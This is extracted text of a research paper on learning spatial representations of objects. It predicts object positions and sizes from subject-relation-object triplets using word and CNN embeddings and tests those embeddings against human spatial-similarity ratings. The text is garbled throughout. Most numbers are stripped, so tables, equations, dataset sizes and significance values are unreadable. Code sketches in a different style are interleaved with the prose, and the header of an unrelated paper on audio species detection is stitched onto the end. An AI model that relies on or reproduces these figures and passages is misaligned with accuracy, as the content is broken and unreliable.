the em- bedding layer models our intuition that spatial prop- erties of objects can be, to a certain extent, en- coded with a vector of continuous features. in this work we test two types of embeddings, visual and linguistic. the next layer simply concatenates the three embeddings together with the subject’s size sb and subject center sc. the inclusion of the subject’s size is aimed at providing a reference size to the model in order to predict the size of the object ob. the resulting concatenated vector [wsws,wrwr,wowo,sc,sb] is then fed into a hidden layer(s) which acts as a composition function for the triplet (s, r, o): one-hot vectors (a.k.a. one-of-k), are sparse vectors with everywhere except for a at the position of the k-th word. we find that without inputing sb to the model, it still learns to predict an “average size” for each object due to the mse penalty. however, to keep the design cleaner and intuitive, here we provide the size of the subject to the model. z = f(wh[wsws,wrwr,wowo,s c,sb] + bh) where f(·) is the non-linearity and wh and bh the parameters of the layer. these “composition lay- ers” allow to distinguish between e.g., (man, walks, horse) which is spatially distinct from (man, rides, horse). we find that adding more layers gener- ally improves performance, so the output z above can simply be composed with more layers, i.e., f(wh z + bh ). finally, a linear output layer tries to match the ground truth targets y = (oc,ob) us- ing a mean squared error (mse) loss function: loss(y, ŷ) = ‖ŷ −y‖ where ŷ = (ôc, ôb) is the model prediction and ‖·‖ denotes the euclidean norm. critically, un- like cnns, the model does not make use of the pixels (which are discarded during the image pre- processing (fig. and sect. . . )), but learns ex- clusively from image coordinates, yielding a simpler model focused solely on spatial information. . . image pre-processing we perform the following pre-processing steps to the images before feeding them to the model. (i) normalize the image coordinates by the num- ber of pixels of each axis (vertical and horizontal). this step guarantees that coordinates are indepen- dent of the resolution of the image and always lie within the [ , ]×[ , ] square, i.e., sc,oc ∈ [ , ] . (ii) mirror the image (when necessary). we no- tice that the distinction between right and left is ar- bitrary in images since a mirrored image completely preserves its spatial meaning. for instance, a “man” “feeding” an “elephant” can be arbitrarily at either side of the “elephant”, while a “man” “riding” an “elephant” cannot be either below or above the “ele- phant”. this left/right arbitrariness has also been acknowledged in prior work (singhal et al., ). thus, to enable a more meaningful learning, we mir- ror the image when (and only when) the object is at the left-hand side of the subject. the choice of leaving the object always to the right-hand side is arbitrary and does not entail a loss of general- ity, i.e., we can consider left/right symmetrically re- flected predictions as equiprobable. mirroring pro- vides thus a more realistic performance evaluation in the prediction task and enables learning representa- tions independent of the right/left distinction which is irrelevant for the spatial semantics. . spatial similarity task to evaluate how well our embeddings match human mental representations of spatial knowledge about objects, we collect ratings for , word pairs (w ,w ) asking annotators to rate them by their spa- tial similarity. 
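before turning to the similarity task, the composition layer and training objective described in the model section above can be restated as

\[ z = f\big(W_h\,[\,W_s\mathbf{w}_s,\; W_r\mathbf{w}_r,\; W_o\mathbf{w}_o,\; s^c,\; s^b\,] + b_h\big), \]
optionally followed by further layers \(f(W_{h_2} z + b_{h_2})\), with a linear output \(\hat{y} = (\hat{o}^c, \hat{o}^b)\) trained under \(\mathrm{loss}(y, \hat{y}) = \lVert \hat{y} - y \rVert^2\) (the square is implied by the stated mse objective). a minimal keras sketch of this regressor follows; the embedding dimension, hidden size, layer count, learning rate, and function name are illustrative assumptions, not the paper's exact values.

# illustrative sketch of the (s, r, o) -> object-box regressor described above
from tensorflow import keras
from tensorflow.keras import layers

def build_spatial_regressor(vocab_s, vocab_r, vocab_o, d=300, hidden=100, n_hidden=2):
    s_in = keras.Input(shape=(1,), dtype="int32")   # subject word id
    r_in = keras.Input(shape=(1,), dtype="int32")   # relationship word id
    o_in = keras.Input(shape=(1,), dtype="int32")   # object word id
    s_box = keras.Input(shape=(4,))                 # subject center (x, y) and half-sizes (bx, by)

    # embedding layers: initialized with glove / cnn features (ini) or random
    # vectors (rnd), and set trainable (u) or frozen (nu), as in the paper
    s_emb = layers.Flatten()(layers.Embedding(vocab_s, d)(s_in))
    r_emb = layers.Flatten()(layers.Embedding(vocab_r, d)(r_in))
    o_emb = layers.Flatten()(layers.Embedding(vocab_o, d)(o_in))

    x = layers.Concatenate()([s_emb, r_emb, o_emb, s_box])
    for _ in range(n_hidden):                       # "composition layers"
        x = layers.Dense(hidden, activation="relu")(x)
    out = layers.Dense(4, activation="linear")(x)   # (o_cx, o_cy, o_bx, o_by)

    model = keras.Model([s_in, r_in, o_in, s_box], out)
    model.compile(optimizer=keras.optimizers.RMSprop(learning_rate=1e-3), loss="mse")
    return model

the subject box is fed alongside the embeddings so that the network has a reference location and size when predicting the object box, mirroring the design described above.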
that is, objects that exhibit similar locations in most situations and are placed similarly relative to other objects would receive a high score, and lower otherwise. for example (cap, sunglasses) would receive a high score as they are usually at the top of the human body, while following a sim- ilar logic, (cap, shoes) would receive a lower score. our collected ratings establish the spatial counter- part to other existing similarity ratings such as se- mantic similarity (silberer and lapata, ), vi- the only conflicting case for the “mirroring” transforma- tion is when the relationship (r) is either “left” or “right,” e.g., (man, left of, car), yet these only account for an insignificant proportion of instances (< . %) and thus we leave them out. sual similarity (silberer and lapata, ) or gen- eral relatedness (agirre et al., ). a few exem- plars of ratings are shown in tab. . following stan- dard practices (pennington et al., ), we compute the prediction of similarity between two embeddings sw and sw (representing words w and w ) with their cosine similarity: cos(sw ,sw ) = sw sw ‖sw ‖‖sw ‖ we notice that this spatial similarity task does not involve learning and its main purpose is to evalu- ate the quality of the representations learned in the prediction task (sect. . ) and the spatial informa- tiveness of visual and linguistic features. word pair rating word pair rating (snowboard, feet) . (horns, backpack) . (ears, eye) . (baby, bag) (cockpit, table) . (hair, laptop) . (cap, hair) (earring, racket) (frisbee, food) . (ears, hat) . table : examples of our collected similarity ratings. experimental setup in this section we describe the experimental settings employed in the tasks and the model. . visual genome data set we obtain our annotated data from visual genome (krishna et al., ). this dataset contains , images and over . m human-annotated object- relationship-object instances (s, r, o) with their corresponding boxes for the object and subject. we keep only those examples for which we have embed- dings available (see sect. . ). this yields ∼ . m instances of the form (s, r, o), , unique im- age objects and , unique relationships (r) for our linguistic embeddings; and ∼ k (s, r, o) instances, , unique image objects and , unique relationships for our visual embeddings. we notice that visual representations do not exist for relationships r (i.e., either prepositions or verbs) and therefore we only require visual embeddings for the pair (s, o) instead of the complete triplet (s, r, o) required in language. notice that since we do not restrict to any particular domain (e.g., furni- ture or landscapes) the combinations (s, r, o) are markedly sparse, which makes learning our predic- tion task especially challenging. . evaluation sets in the prediction task in the prediction task, we consider the following subsets of visual genome (sect. . ) for evaluation purposes: (i) original set: a test split from the original data which contains instances unseen at training time. that is, the test combinations (s, r, o) might have been seen at training time, yet in different in- stances (e.g., in different images). this set contains a large number of noisy combinations such as (peo- ple, walk, funny) or (metal, white, chandelier). (ii) unseen words set: we randomly select a list of objects (e.g., “wheel”, “camera”, “elephant”, etc.) among the most frequent objects in vi- sual genome. 
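as a small illustration of the similarity predictor described earlier, the rating predicted for a word pair is simply the cosine between the two embeddings; a minimal numpy sketch (the function name is ours):

import numpy as np

def predicted_spatial_similarity(s_w1, s_w2):
    # cosine similarity between the embeddings of two objects, used as the
    # model-side prediction to compare against the crowdsourced human ratings
    return float(np.dot(s_w1, s_w2) / (np.linalg.norm(s_w1) * np.linalg.norm(s_w2)))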
we choose them among the most frequent ones in order to avoid meaningless objects such as “gate ”, “number ” or “ : pm” which are not infrequent in visual genome. we then take all instances of combinations that contain any of these words, yielding ∼ k instances. for ex- ample, since “cap” is in our list, (girl, wears, cap) is included in this set. when we enforce “unseen” conditions, we remove all these instances from the training set, using them only for testing. . visual and linguistic features as our linguistic representations, we employ - dimensional glove vectors (pennington et al., ) trained on the common crawl corpus with b- tokens and a . m words vocabulary. we use the publicly available visual representa- tions from collell et al. ( ). they extract - dimensional visual features with the forward pass of a vgg- (visual geometry group) cnn model (chatfield et al., ) pre-trained in imagenet (russakovsky et al., ). the representation of a word is the averaged feature vector (centroid) of the complete list of objects is: [leaves, foot, wheel, t-shirt, ball, handle, skirt, stripe, trunk, face, camera, socks, tail, pants, elephant, ear, helmet, vest, shoe, eye, coat, skateboard, apple, cap, motorcycle]. http://nlp.stanford.edu/projects/glove http://liir.cs.kuleuven.be/software.php all images in imagenet for this concept. they only keep words with at least images available. we notice that although we employ visual features from an external source (imagenet), these could be al- ternatively obtained in the visual genome data— although imagenet generally provides a larger num- ber of images per concept. . method comparison we consider two types of models, those that update the parameters of the embeddings (u ∼ “update”) and those that keep them fixed (nu ∼ “no up- date”) when learning the prediction task. for each type (u and nu) we consider two conditions, em- beddings initialized with pre-trained vectors (ini) and random embeddings (rnd) randomly drawn from a component-wise normal distribution of mean and standard deviation equal to those of the origi- nal embeddings. for example, u-rnd corresponds to a model with updated, random embeddings. for the ini methods we also add a subindex indicating whether the embeddings are visual (vis) or linguistic (lang), as described in sect. . . for the nu type we additionally consider one-hot embeddings ( h). we also include a control method (rand-pred) that outputs random uniform predictions. . implementation details and validation to validate results in our prediction task we employ a -fold cross-validation (cv) scheme. that is, we split the data into parts and employ % of the data for training and % for testing. this yields embeddings (for each “u” method), which are then evaluated in our similarity task. in both tasks, we report results averaged across the folds. model hyperparameters are first selected by cross-validation in initial splits and results are re- ported in new splits. all models employ a learn- ing rate of . and are trained for epochs by backpropagation with the rmsprop optimizer. the dimensionality of the embeddings is the origi- nal one, i.e., d= for glove and d= for vgg- (sect. . ), which is preserved for the random- given that visual representations are not available for the relationships (i.e., verbs and prepositions), the models with vis embeddings employ one-hot embeddings for the relationships and visual embeddings for object and subject. this is a rather neutral choice that enables the vis models to use relationships. 
embedding methods rnd (sect. . ). models em- ploy hidden layers with rectified linear units (relu), followed by an output layer with a linear ac- tivation. early stopping is employed as a regularizer. we implement our models with keras deep learning framework in python . (chollet and others, ). . spatial similarity task to build the word pairs, we randomly select a list of objects from visual genome and from these we randomly chose , non-repeated word pairs (w ,w ). ratings are collected with the crowd- flower platform and correspond to averages of at least reliable annotators that provided ratings in a discrete scale from to . the median similarity rating is . and the mean variance between annota- tors per word pair is ∼ . . . evaluation metrics . . prediction task we evaluate model predictions with the following metrics. (i) regression metrics. . (i) mean squared error (mse) between the pre- dicted ŷ = (ôc, ôb) and the true y = (oc,ob) ob- ject center coordinates and object size. notice that since oc,ob are within [ , ] , the mse is easily in- terpretable, ranging between and . (ii) pearson correlation (r) between the predicted ôc and the true oc object center coordinates. we consider the vertical (ry) and horizontal (rx) com- ponents separately (i.e., ocx and o c y). (iii) coefficient of determination (r ) of the pre- dictions ŷ = (ôc, ôb) and the target y = (oc,ob). r is employed to evaluate goodness of fit of a re- gression model and is related to the percentage of variance of the target explained by the predictions. the best possible score is and it can be arbitrarily negative for bad predictions. a model that outputs either random or constant predictions would obtain scores close to and exactly respectively. https://www.crowdflower.com/ reliable annotators are those with performance over % in the test questions ( in our case) that the crowdsourcing plat- form allows us to introduce in order to test annotators’ accuracy. (ii) classification. additionally, given the seman- tic distinction between the vertical and horizontal axis noted above (sect. . . ), we consider the clas- sification problem of predicting above/below rela- tive locations. that is, if the predicted y-coordinate for the object center ôcy falls below the y-coordinate of the subject center scy and the actual object cen- ter ocy is below the subject center s c y, we count it as a correct prediction, and as incorrect other- wise. likewise for above predictions. we compute both macro-averaged accuracy (accy) and macro- averaged f (f y) metrics. (iii) intersection over union (iou). we consider the bounding box overlap (iou) from the voc de- tection task (everingham et al., ): iou = area(b̂o ∩ bo)/area(b̂o ∪ bo) where b̂o and bo are predicted and ground truth object boxes re- spectively. a prediction is counted as correct if the iou is larger than %. crucially, we notice that our setting and results are not comparable to object de- tection as we employ text instead of images as input and thus we cannot leverage the pixels to locate the object, unlike in detection. . . similarity task following standard practices (pennington et al., ), the performance of the predictions of (co- sine) similarity from the embeddings (described in sect. . ) is evaluated with the spearman correlation ρ against the crowdsourced human ratings. results and discussion we consider the notation of the methods from sect. . and the evaluation subsets described in sect. . for the prediction task. 
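to make the classification and overlap metrics described above concrete, a small sketch of the bounding-box iou and the above/below macro-averaged accuracy follows (boxes are given as a center plus half-sizes, as in the model's output; the helper names, the iou threshold, and the image-axis convention are assumptions, not the paper's):

import numpy as np

def box_iou(center_a, half_a, center_b, half_b):
    # convert (center, half-size) boxes to corners and compute intersection over union
    ax1, ay1 = center_a[0] - half_a[0], center_a[1] - half_a[1]
    ax2, ay2 = center_a[0] + half_a[0], center_a[1] + half_a[1]
    bx1, by1 = center_b[0] - half_b[0], center_b[1] - half_b[1]
    bx2, by2 = center_b[0] + half_b[0], center_b[1] + half_b[1]
    iw = max(0.0, min(ax2, bx2) - max(ax1, bx1))
    ih = max(0.0, min(ay2, by2) - max(ay1, by1))
    inter = iw * ih
    union = (ax2 - ax1) * (ay2 - ay1) + (bx2 - bx1) * (by2 - by1) - inter
    return inter / union if union > 0 else 0.0
# a prediction counts as correct if box_iou(...) exceeds the chosen threshold
# (the exact threshold used in the paper is not recoverable from this text)

def above_below_macro_accuracy(pred_obj_y, true_obj_y, subj_y):
    # "below" is taken here as a larger y than the subject center, assuming a
    # top-left image origin; macro-average the per-class (above/below) accuracies
    pred_below = np.asarray(pred_obj_y) > np.asarray(subj_y)
    true_below = np.asarray(true_obj_y) > np.asarray(subj_y)
    per_class = []
    for cls in (True, False):                       # below, then above
        mask = true_below == cls
        if mask.any():
            per_class.append(float((pred_below[mask] == cls).mean()))
    return float(np.mean(per_class))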
to test statistical significance we employ a friedman rank test and post hoc nemeny tests on the results of the folds. . prediction task table shows that the ini and rnd methods per- form similarly in the original test set, arguably be- macro-averaged accuracy equals to the average of per-class accuracies, with classes {above, below}. similarly for f . for simplicity, we do not add any subindex (vis or lang) to rnd, yet these vectors are drawn from two different distri- butions, i.e., from either vis or lang embeddings (sect. . ). additionally, results tables show two blocks of methods since vis and lang do not share all the instances (see sect. . ). cause a large part of the learning takes place in the parameters of the layers subsequent to the embed- ding layer. however, in the next section we show that this is no longer the case when unseen words are present. we also observe that the one-hot embed- dings nu- h perform slightly better than the rest of methods when no unseen words are present (tab. and tab. right). mse r accy f y rx ry iou u-inilang . . . . . . . u-rndlang . . . . . . . nu-inilang . . . . . . . nu-rndlang . . . . . . . nu- h . . . . . . . rand-pred . - . . . . . . u-inivis . . . . . . . u-rndvis . . . . . . . nu-inivis . . . . . . . nu-rndvis . . . . . . . nu- h . . . . . . . rand-pred . - . . . . . . table : results in the original test set (sect. . ). bold- face indicates best performance within the corresponding block of methods (lang above, and vis below). it is also worth noting that the results of the pre- diction task are, in fact, conservative. first, the original test data contains a considerable number of meaningless (e.g., (giraffe, a, animal)), and ir- relevant combinations (e.g., (clock, has, numbers) or (sticker, identifies, apple)). second, even when only meaningful examples are considered, we are in- evitably penalizing for plausible predictions. for in- stance, in (man, watching, man) we expect both men to be reasonably separated on the x-axis yet the one with the highest y coordinate is generally not pre- dictable as it depends on their height and their dis- tance to the camera. this yields above/below classi- fication performance and correlations. regardless, all methods (except rand-pred) exhibit reasonably high performance in all measures. . . evaluation on unseen words table evidences that both visual and linguistic embeddings (inivis and inilang) significantly out- perform their random-embedding counterparts rnd by a large margin when unseen words are present. the improvement occurs for both, updated (u) and non-updated (nu) embeddings—although it is ex- pected that the updated methods perform slightly worse than the non-updated ones since the original embeddings will have “moved” during training and therefore an unseen embedding (which has not been updated) might no longer be close to other semanti- cally similar vectors in the updated space. besides statistical significance, it is worth men- tioning that the ini methods consistently outper- formed both their rnd counterparts and nu- h in each of the folds (not shown here) by a steadily large margin. in fact, results are markedly stable across folds, in part due to the large size of the train- ing and test sets (> . m and > k examples re- spectively). additionally, to ensure that “unseen” results are not dependent on our particular list of objects, we repeated the experiment with two addi- tional lists of randomly selected objects, obtaining very similar results. 
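the significance testing mentioned at the start of this results discussion (a friedman rank test over the per-fold results, followed by post hoc nemenyi comparisons) can be sketched with scipy; the scores below are placeholders rather than values from the paper, and the nemenyi step would require an additional package or a manual implementation, so it is not shown:

from scipy.stats import friedmanchisquare

# one score per cross-validation fold for each method (placeholder values)
scores_ini  = [0.71, 0.70, 0.72, 0.71, 0.70]
scores_rnd  = [0.55, 0.56, 0.54, 0.55, 0.57]
scores_1hot = [0.60, 0.61, 0.59, 0.60, 0.60]

stat, p_value = friedmanchisquare(scores_ini, scores_rnd, scores_1hot)
print(f"friedman chi-square = {stat:.3f}, p = {p_value:.4f}")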
remarkably, the ini methods experience only a small performance drop under unseen conditions (tab. , left) compared to when we allow them to train with these words (tab. , right), and this differ- ence might be partially attributed to the reduction of the training data under “unseen” conditions, where at least % of the training data are left out. altogether, these results on unseen words show that semantic and visual similarities between con- cepts, as encoded by word and visual embeddings, can be leveraged by the model in order to predict spatial knowledge about unseen words. . . qualitative insight visual inspection of model predictions is instruc- tive in order to gain insight on the spatial informa- tiveness of visual and linguistic representations on unseen words. figure shows heat maps of low (black) and high (white) probability regions for the objects. the “heat” for the object is assumed to be normally distributed with mean (µ) equal to the pre- dicted object center ôc and standard deviation (σ) equal to the predicted object size ôb (assuming in- dependence of the x and y components, which yields the product of two gaussians, one for each compo- nent x and y). the “heat” for the subject is com- puted similarly, although with µ and σ equal to the in this prediction task we have additionally considered the concatenation of visual and linguistic representations (not shown), which did not show any relevant improvement over the unimodal representations. unseen words condition seen words condition mse r accy f y rx ry iou mse r accy f y rx ry iou u-inilang . ∗� . ∗� . ∗� . ∗� . ∗� . ∗ . ∗� . . ∗ . . . . . u-rndlang . . . . . . . . . . . . . . nu-inilang . ∗� . ∗� . ∗� . ∗� . ∗� . ∗� . ∗� . . ∗ . . . . . nu-rndlang . . . . . . . . . . . . . . nu- h . . . . . . . . . . . . . . rand-pred . - . . . . . . . - . . . - . - . . u-inivis . ∗� . ∗� . ∗� . ∗� . ∗� . ∗� . ∗� . . . . . . . u-rndvis . . . . . . . . . . . . . . nu-inivis . ∗� . ∗� . ∗� . ∗� . ∗� . ∗� . ∗� . . . . . . . nu-rndvis . . . . . . . . . . . . . . nu- h . . . . . . . . . . . . . . rand-pred . - . . . - . . . . - . . . - . - . . table : results in the unseen words set (sect. . ). left table: results of enforcing “unseen” conditions, i.e., leaving out all words of the unseen words set from our training data. right table: the models are evaluated in the same set but we allow them to train with the words from this set. asterisks (∗) in an ini method indicate significantly better performance (p < . ) than its rnd counterpart (i.e., u-iniemb type is compared against u-rnd, and nu- iniemb type against nu-rnd). diamonds (�) indicate significantly better performance than nu- h. actual subject center sc and size sb, respectively. the ini methods in figure illustrate the contri- bution of the embeddings to the spatial understand- ing of unseen objects. in general, both visual and linguistic embeddings enabled predicting meaning- ful spatial arrangements, yet for the sake of space we have only included three examples where: vis performs better than lang (third column), where lang performs better than vis (second column), and where both perform well (first column). we notice that the embeddings enable the model to infer that e.g., since “camera” (unseen) is similar to “cam- corder” (seen at training time), both must behave spatially similarly. likewise, the embeddings enable predicting correctly the relative sizes of unseen ob- jects. 
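the qualitative heat maps just described treat the predicted box as an axis-aligned gaussian over the normalized image; a minimal sketch of rendering one such map from a prediction (the function name and grid resolution are ours):

import numpy as np

def prediction_heatmap(center, half_size, resolution=100):
    # "heat" for a predicted box: product of two independent gaussians with mean
    # equal to the predicted center and std equal to the predicted half-sizes,
    # over the normalized [0, 1] x [0, 1] image
    xs = np.linspace(0.0, 1.0, resolution)
    ys = np.linspace(0.0, 1.0, resolution)
    gx = np.exp(-0.5 * ((xs - center[0]) / half_size[0]) ** 2)
    gy = np.exp(-0.5 * ((ys - center[1]) / half_size[1]) ** 2)
    heat = np.outer(gy, gx)        # rows index y, columns index x
    return heat / heat.max()       # peak (white) normalized to 1.0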
we also observe that when the embeddings are not informative enough, model predictions be- come less accurate. for instance, in nu-inilang, some unrelated objects (e.g., “ipod”) have embed- dings similar to “apple”, and analogously for nu- inivis and “tail”. we finally notice that predictions on unseen objects using random embeddings (rnd) are markedly bad. . spatial similarity task table shows the results of evaluating the em- beddings, including those learned in the predic- tion task, against the human ratings of spatial sim- ilarity (sect. . ). hence, only the “updated” methods (u) are shown and we additionally in- clude the concatenation of visual and linguistic embeddings concglove+vgg- and the concate- nation of the corresponding updated embeddings concu-inilang+u-inivis . lang v&l glove . . vgg- - . concglove+vgg- - . u-inilang . ± . ∗ . ± . ∗ u-inivis - . ± . ∗ concu-inilang+u-inivis - . ± . ∗ u-rnd . ± . . ± . # word pairs table : spearman correlations between model predic- tions and human ratings. standard errors across folds are shown for the methods that involve learning (second block). columns correspond to the word pairs for which both embeddings (vis and lang) are available (v&l) and those for which only the linguistic embeddings are available (lang). asterisk (∗) indicates significant im- provement (p < . ) of a u-ini method of the second block (u-inivis and u-inilang) over its corresponding untrained embedding (i.e., vgg- or glove respec- tively) from the first block. the first thing to notice in tab. is that both visual and linguistic embeddings show good corre- lations with human spatial ratings (ρ > . and ρ > . respectively), suggesting that visual and linguistic features carry significant knowledge about n u -i n i la n g camcorder tripod viewfinder screen . . . . wings hind feather beak . . . . ipod lemon cranberry cinnamon . . . . person, holding, applezebra, has, tailman, holding, camera n u -i n i vi s viewfinder shutter lens camcorder . . . . bird feeder woodpecker pigeon . . . . pear fruit tomato melon . . . . n u -r n d obstacle region bone interstate . . . . brandings tree peppercorns ladies . . . . diploma manicure sweatpants garage . . . . figure : heat maps of predictions of the nu-inilang, u-inivis and nu-rnd methods. the unseen objects are underlined (top of the image) and their corresponding four (cosine-based) nearest neighbors are shown below with their respective cosine similarities. spatial properties of objects. in particular, linguistic features seem to be more spatially informative than visual features. crucially, we observe a significant improvement of the u-inivis over the original visual vectors (vgg- ) (p < . ) and of the u-inilang over the original linguistic embeddings (glove) (p < . ), which evidence the effectiveness of training in the prediction task as a method to further specialize em- beddings in spatial knowledge. it is worth mention- ing that these improvements are consistent in each of the folds (not shown here) and markedly sta- ble (see standard errors in tab. ). we additionally observe that the concate- nation of visual and linguistic embeddings concglove+vgg- outperforms all unimodal embeddings by a margin, suggesting that the fusion of visual and linguistic features provides a more complete description of spatial properties of objects. remarkably, the improvement is even larger for the concatenation of the embeddings updated during training concu-inilang+u-inivis , which obtains the highest performance overall. 
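A minimal sketch of this spatial similarity evaluation, under stated assumptions: cosine similarities between embedding pairs are correlated (Spearman) with the human ratings. The dictionary of embeddings and the list of rated pairs are hypothetical inputs standing in for the collected dataset.

```python
import numpy as np
from scipy.stats import spearmanr

def cosine(u, v):
    return float(np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v)))

def spatial_similarity_eval(embeddings, rated_pairs):
    """Spearman correlation between embedding cosine similarities and human ratings.
    `embeddings` maps a word to a vector; `rated_pairs` is a list of (w1, w2, rating)."""
    model_scores, human_scores = [], []
    for w1, w2, rating in rated_pairs:
        if w1 in embeddings and w2 in embeddings:
            model_scores.append(cosine(embeddings[w1], embeddings[w2]))
            human_scores.append(rating)
    rho, p_value = spearmanr(model_scores, human_scores)
    return rho, p_value
```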
figure illustrates the progressive specialization of our embeddings in spatial knowledge as we train them in our prediction task. we notice that all em- beddings improve, yet u-inilang seem to worsen their quality when we over-train them—likely due to overfitting, as we do not use any regularizer besides early stopping. we also observe that although the random embeddings (rnd) are the ones that benefit the most from the training, their performance is still far from that of u-inivis and u-inilang, suggesting the importance of visual and linguistic features to represent spatial properties of objects. . . . . . . sp ea rm an c o rr e la ti o n number of epochs u-inilang u-inivis u-rnd glove vgg- figure : correlation between human ratings and embed- ding cosine similarities at each number of epochs. it is relevant to mention that in a pilot study we crowdsourced a different list of , object pairs where we employed instead of annotators per row. results stayed remarkably consistent with those presented here—the improvement for the up- dated embeddings was in fact even larger. limitations of the current approach and future work in order to keep the design clean in this first paper on distributed spatial representations we em- ploy a fully supervised setup. however, we notice that methods to automatically parse images (e.g., ob- ject detectors) and sentences are available. a second limitation is the d simplification of the actual d world that our approach and the current spatial literature generally employs. even though methods that infer d structure from d images ex- ist, this is beyond the scope of this paper which shows that a d treatment already enhances the learned spatial representations. it is also worth not- ing that the proposed regression setting trivially gen- eralizes to d if suitable data are available, and in fact, we believe that the learned representations could further benefit from such extension. conclusions altogether, this paper sheds light on the problem of learning distributed spatial representations of ob- jects. to learn spatial representations we have lever- aged the task of predicting the continuous d rel- ative spatial arrangement of two objects under a relationship, and a simple embedding-based neural model that learns this task from annotated images. in the same prediction task we have shown that both word embeddings and cnn features endow the model with great predictive power when is presented with unseen objects. next, in order to assess the spa- tial content of distributed representations, we have collected a set of , object pairs rated by spatial similarity. we have shown that both word embed- dings and cnn features are good predictors of hu- man spatial judgments. more specifically, we find that word embeddings (ρ = . ) tend to perform better than visual features (ρ ∼ . ), and that their combination (ρ ∼ . ) outperforms both modalities separately. crucially, in the same ratings we have shown that by training the embeddings in the pre- diction task we can further specialize them in spatial knowledge, making them more akin to human spa- tial judgments. to benchmark the task, we make the similarity dataset and our trained spatial representa- tions publicly available. lastly, this paper contributes to the automatic un- https://github.com/gcollell/spatial-representations derstanding of spatial expressions in language. 
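The epoch-wise specialization curve discussed above can be sketched in the same spirit; the snapshot list below is a hypothetical helper structure (embeddings saved at the end of every epoch), not part of the released code.

```python
import numpy as np
from scipy.stats import spearmanr

def correlation_by_epoch(snapshots, rated_pairs):
    """Spearman correlation between human ratings and embedding cosine similarities
    after each training epoch. `snapshots` is a list of {word: vector} dictionaries."""
    curve = []
    for emb in snapshots:
        model_sims, ratings = [], []
        for w1, w2, rating in rated_pairs:
            u, v = emb[w1], emb[w2]
            model_sims.append(np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v)))
            ratings.append(rating)
        curve.append(spearmanr(model_sims, ratings)[0])
    return curve  # an early-stopping point can be chosen where this curve peaks
```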
the lack of common sense knowledge has been recur- rently argued as one of the main reasons why ma- chines fail at exhibiting more “human-like” behav- ior in tasks (lin and parikh, ). here, we have provided a means of compressing and encod- ing such common sense spatial knowledge about ob- jects into distributed representations, further show- ing that these specialized representations correlate well with human judgments. in future work, we will also explore the application of our trained spatial embeddings in extrinsic tasks in which representing spatial knowledge is essential such as robot naviga- tion or robot understanding of natural language com- mands (guadarrama et al., ; moratz and ten- brink, ). robot navigation tasks such as assist- ing people with special needs (blind, elderly, etc.) are in fact becoming increasingly necessary (ye et al., ) and require great understanding of spatial language and spatial connotations of objects. acknowledgments this work has been supported by the chist-era eu project muster and by the ku leuven grant run/ / . we additionally thank our anony- mous reviewers for their insightful comments which helped to improve the overall quality of the paper, and the action editors for their helpful assistance. references eneko agirre, enrique alfonseca, keith hall, jana kravalova, marius paşca, and aitor soroa. . a study on similarity and relatedness using distribu- tional and wordnet-based approaches. in naacl, pages – . acl. mohit bansal, kevin gimpel, and karen livescu. . tailoring continuous word representations for de- pendency parsing. in acl, pages – . ken chatfield, karen simonyan, andrea vedaldi, and andrew zisserman. . return of the devil in the details: delving deep into convolutional nets. in bmvc. françois chollet et al. . keras. https:// github.com/fchollet/keras. guillem collell and marie-francine moens. . is an image worth more than a thousand words? on the fine-grain semantic differences between visual and http://www.chistera.eu/projects/muster linguistic representations. in coling, pages – . acl. guillem collell, teddy zhang, and marie-francine moens. . imagined visual representations as multimodal embeddings. in aaai, pages – . aaai. guillem collell, luc van gool, and marie-francine moens. . acquiring common sense spatial knowledge through implicit spatial templates. in aaai. aaai. desmond elliott and frank keller. . image de- scription using visual dependency representations. in emnlp, volume , pages – . mark everingham, s.m. ali eslami, luc van gool, christopher k.i. williams, john winn, and andrew zisserman. . the pascal visual object classes challenge: a retrospective. international journal of computer vision, ( ): – . jerome feldman, george lakoff, david bailey, srini narayanan, terry regier, and andreas stolcke. . l -the first five years of an automated language acquisition project. integration of natural language and vision processing, : . kenneth d. forbus, paul nielsen, and boi faltings. . qualitative spatial reasoning: the clock project. artificial intelligence, ( - ): – . sergio guadarrama, lorenzo riano, dave golland, daniel go, yangqing jia, dan klein, pieter abbeel, trevor darrell, et al. . grounding spatial re- lations for human-robot interaction. in iros, pages – . ieee. douwe kiela, felix hill, and stephen clark. . spe- cializing word embeddings for similarity or related- ness. in emnlp, pages – . 
ranjay krishna, yuke zhu, oliver groth, justin johnson, kenji hata, joshua kravitz, stephanie chen, yannis kalantidis, li-jia li, david a. shamma, et al. . visual genome: connecting language and vision us- ing crowdsourced dense image annotations. interna- tional journal of computer vision, ( ): – . geert-jan m. kruijff, hendrik zender, patric jensfelt, and henrik i. christensen. . situated dialogue and spatial organization: what, where and why? international journal of advanced robotic systems, ( ): . xiao lin and devi parikh. . don’t just listen, use your imagination: leveraging visual common sense for non-visual tasks. in cvpr, pages – . mateusz malinowski and mario fritz. . a pooling approach to modelling spatial relations for image retrieval and annotation. arxiv preprint arxiv: . v . reinhard moratz and thora tenbrink. . spatial ref- erence in linguistic human-robot interaction: itera- tive, empirically supported development of a model of projective relations. spatial cognition and com- putation, ( ): – . jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word representation. in emnlp, volume , pages – . james pustejovsky, jessica moszkowicz, and marc ver- hagen. . a linguistically grounded annota- tion language for spatial information. traitement au- tomatique des langues, ( ): – . terry regier. . the human semantic potential: spatial language and constrained connectionism. mit press. olga russakovsky, jia deng, hao su, jonathan krause, sanjeev satheesh, sean ma, zhiheng huang, andrej karpathy, aditya khosla, michael bernstein, et al. . imagenet large scale visual recognition chal- lenge. international journal of computer vision, ( ): – . sz-rung shiang, stephanie rosenthal, anatole gersh- man, jaime carbonell, and jean oh. . vision- language fusion for object recognition. in aaai, pages – . aaai. carina silberer and mirella lapata. . learn- ing grounded meaning representations with autoen- coders. in acl, pages – . amit singhal, jiebo luo, and weiyu zhu. . proba- bilistic spatial context models for scene content un- derstanding. in cvpr, volume , pages – . ieee. duyu tang, furu wei, nan yang, ming zhou, ting liu, and bing qin. . learning sentiment-specific word embedding for twitter sentiment classification. in acl, pages – . cang ye, soonhac hong, and amirhossein tamjidi. . -dof pose estimation of a robotic naviga- tion aid by tracking visual and geometric features. ieee transactions on automation science and engi- neering, ( ): – . submitted december accepted april published april corresponding author carlos j. corrada bravo, carlos.corrada @upr.edu academic editor elena marchiori additional information and declarations can be found on page doi . /peerj-cs. copyright corrada bravo et al. distributed under creative commons cc-by . open access species-specific audio detection: a comparison of three template-based detection algorithms using random forests carlos j. corrada bravo , , rafael Álvarez berríos and t. mitchell aide , department of computer science, university of puerto 